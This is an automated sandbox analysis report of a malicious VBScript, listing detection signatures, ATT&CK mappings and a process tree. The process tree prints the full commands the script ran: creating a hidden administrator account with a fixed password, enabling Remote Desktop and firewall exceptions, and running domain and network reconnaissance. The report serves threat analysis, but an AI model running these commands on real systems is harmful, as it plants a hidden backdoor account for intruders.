e86d3fd7a2ff1bc75d750b661dfd3ab357b611028abfbbedd4653b930160d6d2

Analysis

max time kernel
52s
max time network
112s
platform
windows10_x64
resource
win10v20201028
submitted
04/12/2020, 12:41

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

exec.vbs
Size

4KB
MD5

263982dde8e02ce8000fa16c41bba4e1
SHA1

8df009693867173902c97b9f5920f23607f4cf93
SHA256

e86d3fd7a2ff1bc75d750b661dfd3ab357b611028abfbbedd4653b930160d6d2
SHA512

f44a7a982344cb6e27d3a689c716d88c213d33b5822c9cbddf401ca4e13e471f557dba3db50c662be297eaefa285169b73bc99e17367ca513894d6de9548980d

Score

9^/10

evasion persistence

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blacklisted process makes network request 1 IoCs

flow	pid	Process
26	60	WScript.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Deletes itself 1 IoCs

pid	Process
60	WScript.exe

Modifies WinLogon 2 TTPs 3 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm443 = "0"	reg.exe

Discovers systems in the same network 1 TTPs 2 IoCs

discovery

Remote System Discovery

T1018

pid	Process
3604	net.exe
4068	net.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
3928	tasklist.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
2604	ipconfig.exe
912	NETSTAT.EXE

Runs net.exe

Suspicious use of AdjustPrivilegeToken 86 IoCs

description	pid	Process
Token: SeDebugPrivilege	3928	tasklist.exe
Token: SeDebugPrivilege	912	NETSTAT.EXE
Token: SeIncreaseQuotaPrivilege	1252	WMIC.exe
Token: SeSecurityPrivilege	1252	WMIC.exe
Token: SeTakeOwnershipPrivilege	1252	WMIC.exe
Token: SeLoadDriverPrivilege	1252	WMIC.exe
Token: SeSystemProfilePrivilege	1252	WMIC.exe
Token: SeSystemtimePrivilege	1252	WMIC.exe
Token: SeProfSingleProcessPrivilege	1252	WMIC.exe
Token: SeIncBasePriorityPrivilege	1252	WMIC.exe
Token: SeCreatePagefilePrivilege	1252	WMIC.exe
Token: SeBackupPrivilege	1252	WMIC.exe
Token: SeRestorePrivilege	1252	WMIC.exe
Token: SeShutdownPrivilege	1252	WMIC.exe
Token: SeDebugPrivilege	1252	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1252	WMIC.exe
Token: SeRemoteShutdownPrivilege	1252	WMIC.exe
Token: SeUndockPrivilege	1252	WMIC.exe
Token: SeManageVolumePrivilege	1252	WMIC.exe
Token: 33	1252	WMIC.exe
Token: 34	1252	WMIC.exe
Token: 35	1252	WMIC.exe
Token: 36	1252	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1252	WMIC.exe
Token: SeSecurityPrivilege	1252	WMIC.exe
Token: SeTakeOwnershipPrivilege	1252	WMIC.exe
Token: SeLoadDriverPrivilege	1252	WMIC.exe
Token: SeSystemProfilePrivilege	1252	WMIC.exe
Token: SeSystemtimePrivilege	1252	WMIC.exe
Token: SeProfSingleProcessPrivilege	1252	WMIC.exe
Token: SeIncBasePriorityPrivilege	1252	WMIC.exe
Token: SeCreatePagefilePrivilege	1252	WMIC.exe
Token: SeBackupPrivilege	1252	WMIC.exe
Token: SeRestorePrivilege	1252	WMIC.exe
Token: SeShutdownPrivilege	1252	WMIC.exe
Token: SeDebugPrivilege	1252	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1252	WMIC.exe
Token: SeRemoteShutdownPrivilege	1252	WMIC.exe
Token: SeUndockPrivilege	1252	WMIC.exe
Token: SeManageVolumePrivilege	1252	WMIC.exe
Token: 33	1252	WMIC.exe
Token: 34	1252	WMIC.exe
Token: 35	1252	WMIC.exe
Token: 36	1252	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3460	WMIC.exe
Token: SeSecurityPrivilege	3460	WMIC.exe
Token: SeTakeOwnershipPrivilege	3460	WMIC.exe
Token: SeLoadDriverPrivilege	3460	WMIC.exe
Token: SeSystemProfilePrivilege	3460	WMIC.exe
Token: SeSystemtimePrivilege	3460	WMIC.exe
Token: SeProfSingleProcessPrivilege	3460	WMIC.exe
Token: SeIncBasePriorityPrivilege	3460	WMIC.exe
Token: SeCreatePagefilePrivilege	3460	WMIC.exe
Token: SeBackupPrivilege	3460	WMIC.exe
Token: SeRestorePrivilege	3460	WMIC.exe
Token: SeShutdownPrivilege	3460	WMIC.exe
Token: SeDebugPrivilege	3460	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3460	WMIC.exe
Token: SeRemoteShutdownPrivilege	3460	WMIC.exe
Token: SeUndockPrivilege	3460	WMIC.exe
Token: SeManageVolumePrivilege	3460	WMIC.exe
Token: 33	3460	WMIC.exe
Token: 34	3460	WMIC.exe
Token: 35	3460	WMIC.exe
Token: 36	3460	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3460	WMIC.exe
Token: SeSecurityPrivilege	3460	WMIC.exe
Token: SeTakeOwnershipPrivilege	3460	WMIC.exe
Token: SeLoadDriverPrivilege	3460	WMIC.exe
Token: SeSystemProfilePrivilege	3460	WMIC.exe
Token: SeSystemtimePrivilege	3460	WMIC.exe
Token: SeProfSingleProcessPrivilege	3460	WMIC.exe
Token: SeIncBasePriorityPrivilege	3460	WMIC.exe
Token: SeCreatePagefilePrivilege	3460	WMIC.exe
Token: SeBackupPrivilege	3460	WMIC.exe
Token: SeRestorePrivilege	3460	WMIC.exe
Token: SeShutdownPrivilege	3460	WMIC.exe
Token: SeDebugPrivilege	3460	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3460	WMIC.exe
Token: SeRemoteShutdownPrivilege	3460	WMIC.exe
Token: SeUndockPrivilege	3460	WMIC.exe
Token: SeManageVolumePrivilege	3460	WMIC.exe
Token: 33	3460	WMIC.exe
Token: 34	3460	WMIC.exe
Token: 35	3460	WMIC.exe
Token: 36	3460	WMIC.exe

Suspicious use of WriteProcessMemory 96 IoCs

description	pid	Process	procid_target
PID 60 wrote to memory of 2704	60	WScript.exe	74
PID 60 wrote to memory of 2704	60	WScript.exe	74
PID 2704 wrote to memory of 3928	2704	cmd.exe	76
PID 2704 wrote to memory of 3928	2704	cmd.exe	76
PID 60 wrote to memory of 4068	60	WScript.exe	78
PID 60 wrote to memory of 4068	60	WScript.exe	78
PID 4068 wrote to memory of 3336	4068	cmd.exe	80
PID 4068 wrote to memory of 3336	4068	cmd.exe	80
PID 3336 wrote to memory of 2720	3336	net.exe	81
PID 3336 wrote to memory of 2720	3336	net.exe	81
PID 4068 wrote to memory of 648	4068	cmd.exe	82
PID 4068 wrote to memory of 648	4068	cmd.exe	82
PID 648 wrote to memory of 820	648	net.exe	83
PID 648 wrote to memory of 820	648	net.exe	83
PID 4068 wrote to memory of 868	4068	cmd.exe	85
PID 4068 wrote to memory of 868	4068	cmd.exe	85
PID 868 wrote to memory of 504	868	net.exe	86
PID 868 wrote to memory of 504	868	net.exe	86
PID 4068 wrote to memory of 732	4068	cmd.exe	87
PID 4068 wrote to memory of 732	4068	cmd.exe	87
PID 732 wrote to memory of 3712	732	net.exe	88
PID 732 wrote to memory of 3712	732	net.exe	88
PID 4068 wrote to memory of 2216	4068	cmd.exe	89
PID 4068 wrote to memory of 2216	4068	cmd.exe	89
PID 2216 wrote to memory of 3056	2216	net.exe	90
PID 2216 wrote to memory of 3056	2216	net.exe	90
PID 4068 wrote to memory of 2416	4068	cmd.exe	91
PID 4068 wrote to memory of 2416	4068	cmd.exe	91
PID 4068 wrote to memory of 4072	4068	cmd.exe	92
PID 4068 wrote to memory of 4072	4068	cmd.exe	92
PID 4068 wrote to memory of 1604	4068	cmd.exe	93
PID 4068 wrote to memory of 1604	4068	cmd.exe	93
PID 4068 wrote to memory of 3428	4068	cmd.exe	94
PID 4068 wrote to memory of 3428	4068	cmd.exe	94
PID 4068 wrote to memory of 1100	4068	cmd.exe	95
PID 4068 wrote to memory of 1100	4068	cmd.exe	95
PID 4068 wrote to memory of 416	4068	cmd.exe	96
PID 4068 wrote to memory of 416	4068	cmd.exe	96
PID 416 wrote to memory of 3784	416	net.exe	97
PID 416 wrote to memory of 3784	416	net.exe	97
PID 4068 wrote to memory of 3928	4068	cmd.exe	98
PID 4068 wrote to memory of 3928	4068	cmd.exe	98
PID 60 wrote to memory of 3968	60	WScript.exe	99
PID 60 wrote to memory of 3968	60	WScript.exe	99
PID 3968 wrote to memory of 2812	3968	cmd.exe	101
PID 3968 wrote to memory of 2812	3968	cmd.exe	101
PID 2812 wrote to memory of 3680	2812	net.exe	102
PID 2812 wrote to memory of 3680	2812	net.exe	102
PID 3968 wrote to memory of 660	3968	cmd.exe	103
PID 3968 wrote to memory of 660	3968	cmd.exe	103
PID 660 wrote to memory of 648	660	net.exe	104
PID 660 wrote to memory of 648	660	net.exe	104
PID 3968 wrote to memory of 548	3968	cmd.exe	105
PID 3968 wrote to memory of 548	3968	cmd.exe	105
PID 3968 wrote to memory of 868	3968	cmd.exe	106
PID 3968 wrote to memory of 868	3968	cmd.exe	106
PID 3968 wrote to memory of 2872	3968	cmd.exe	107
PID 3968 wrote to memory of 2872	3968	cmd.exe	107
PID 3968 wrote to memory of 732	3968	cmd.exe	108
PID 3968 wrote to memory of 732	3968	cmd.exe	108
PID 732 wrote to memory of 428	732	net.exe	109
PID 732 wrote to memory of 428	732	net.exe	109
PID 3968 wrote to memory of 2604	3968	cmd.exe	110
PID 3968 wrote to memory of 2604	3968	cmd.exe	110
PID 3968 wrote to memory of 3460	3968	cmd.exe	111
PID 3968 wrote to memory of 3460	3968	cmd.exe	111
PID 3460 wrote to memory of 3432	3460	net.exe	112
PID 3460 wrote to memory of 3432	3460	net.exe	112
PID 3968 wrote to memory of 3604	3968	cmd.exe	113
PID 3968 wrote to memory of 3604	3968	cmd.exe	113
PID 3968 wrote to memory of 4068	3968	cmd.exe	117
PID 3968 wrote to memory of 4068	3968	cmd.exe	117
PID 3968 wrote to memory of 3044	3968	cmd.exe	118
PID 3968 wrote to memory of 3044	3968	cmd.exe	118
PID 3968 wrote to memory of 644	3968	cmd.exe	119
PID 3968 wrote to memory of 644	3968	cmd.exe	119
PID 3968 wrote to memory of 2816	3968	cmd.exe	120
PID 3968 wrote to memory of 2816	3968	cmd.exe	120
PID 2816 wrote to memory of 348	2816	net.exe	121
PID 2816 wrote to memory of 348	2816	net.exe	121
PID 3968 wrote to memory of 912	3968	cmd.exe	122
PID 3968 wrote to memory of 912	3968	cmd.exe	122
PID 60 wrote to memory of 200	60	WScript.exe	123
PID 60 wrote to memory of 200	60	WScript.exe	123
PID 200 wrote to memory of 1252	200	cmd.exe	125
PID 200 wrote to memory of 1252	200	cmd.exe	125
PID 60 wrote to memory of 2688	60	WScript.exe	126
PID 60 wrote to memory of 2688	60	WScript.exe	126
PID 2688 wrote to memory of 3460	2688	cmd.exe	128
PID 2688 wrote to memory of 3460	2688	cmd.exe	128
PID 60 wrote to memory of 2172	60	WScript.exe	129
PID 60 wrote to memory of 2172	60	WScript.exe	129
PID 2172 wrote to memory of 2384	2172	cmd.exe	131
PID 2172 wrote to memory of 2384	2172	cmd.exe	131
PID 2384 wrote to memory of 1496	2384	net.exe	132
PID 2384 wrote to memory of 1496	2384	net.exe	132

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\exec.vbs"
1⤵
- Blacklisted process makes network request
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:60
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /C tasklist > "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2704
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:3928
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /C net user adm443 pusd117!!!! /ADD /active:YES /expires:NEVER > "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>&1 & net user adm443 /expires:NEVER & net localgroup administrators adm443 /add >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & net localgroup "Remote Desktop Users" adm443 /add >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & net accounts /maxpwage:unlimited >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v adm443 /t REG_DWORD /d 0 /f >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & netsh firewall set service remoteadmin enable >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & netsh firewall set service remotedesktop enable >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & net start TermService >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & reg query "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4068
- - C:\Windows\system32\net.exe
    net user adm443 pusd117!!!! /ADD /active:YES /expires:NEVER
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3336
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user adm443 pusd117!!!! /ADD /active:YES /expires:NEVER
      4⤵
      PID:2720
- - C:\Windows\system32\net.exe
    net user adm443 /expires:NEVER
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:648
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user adm443 /expires:NEVER
      4⤵
      PID:820
- - C:\Windows\system32\net.exe
    net localgroup administrators adm443 /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:868
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators adm443 /add
      4⤵
      PID:504
- - C:\Windows\system32\net.exe
    net localgroup "Remote Desktop Users" adm443 /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:732
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup "Remote Desktop Users" adm443 /add
      4⤵
      PID:3712
- - C:\Windows\system32\net.exe
    net accounts /maxpwage:unlimited
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2216
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 accounts /maxpwage:unlimited
      4⤵
      PID:3056
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v adm443 /t REG_DWORD /d 0 /f
    3⤵
    - Modifies WinLogon
    PID:2416
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    3⤵
    PID:4072
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
    3⤵
    PID:1604
- - C:\Windows\system32\netsh.exe
    netsh firewall set service remoteadmin enable
    3⤵
    PID:3428
- - C:\Windows\system32\netsh.exe
    netsh firewall set service remotedesktop enable
    3⤵
    PID:1100
- - C:\Windows\system32\net.exe
    net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:416
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start TermService
      4⤵
      PID:3784
- - C:\Windows\system32\reg.exe
    reg query "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
    3⤵
    PID:3928
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /C net session > "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>&1 & net share >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & quser >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & arp -a >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & net use >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & net localgroup >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & ipconfig /all >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & net config workstation >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & net view /all >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & net view /all /domain >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & nltest /domain_trusts >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & nltest /domain_trusts /all_trusts >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & net group "Domain Admins" /domain >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & netstat -a >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3968
- - C:\Windows\system32\net.exe
    net session
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2812
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:3680
- - C:\Windows\system32\net.exe
    net share
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:660
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 share
      4⤵
      PID:648
- - C:\Windows\system32\quser.exe
    quser
    3⤵
    PID:548
- - C:\Windows\system32\ARP.EXE
    arp -a
    3⤵
    PID:868
- - C:\Windows\system32\net.exe
    net use
    3⤵
    PID:2872
- - C:\Windows\system32\net.exe
    net localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:732
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:428
- - C:\Windows\system32\ipconfig.exe
    ipconfig /all
    3⤵
    - Gathers network information
    PID:2604
- - C:\Windows\system32\net.exe
    net config workstation
    3⤵
    PID:3460
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 config workstation
      4⤵
      PID:3432
- - C:\Windows\system32\net.exe
    net view /all
    3⤵
    - Discovers systems in the same network
    PID:3604
- - C:\Windows\system32\net.exe
    net view /all /domain
    3⤵
    - Discovers systems in the same network
    PID:4068
- - C:\Windows\system32\nltest.exe
    nltest /domain_trusts
    3⤵
    PID:3044
- - C:\Windows\system32\nltest.exe
    nltest /domain_trusts /all_trusts
    3⤵
    PID:644
- - C:\Windows\system32\net.exe
    net group "Domain Admins" /domain
    3⤵
    PID:2816
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 group "Domain Admins" /domain
      4⤵
      PID:348
- - C:\Windows\system32\NETSTAT.EXE
    netstat -a
    3⤵
    - Gathers network information
    - Suspicious use of AdjustPrivilegeToken
    PID:912
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wmic logicaldisk > "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>&1
  2⤵
  PID:200
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic logicaldisk
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1252
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wmic qfe > "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>&1
  2⤵
  PID:2688
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic qfe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3460
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /C net user > "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>&1
  2⤵
  PID:2172
- - C:\Windows\system32\net.exe
    net user
    3⤵
    PID:2384
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:1496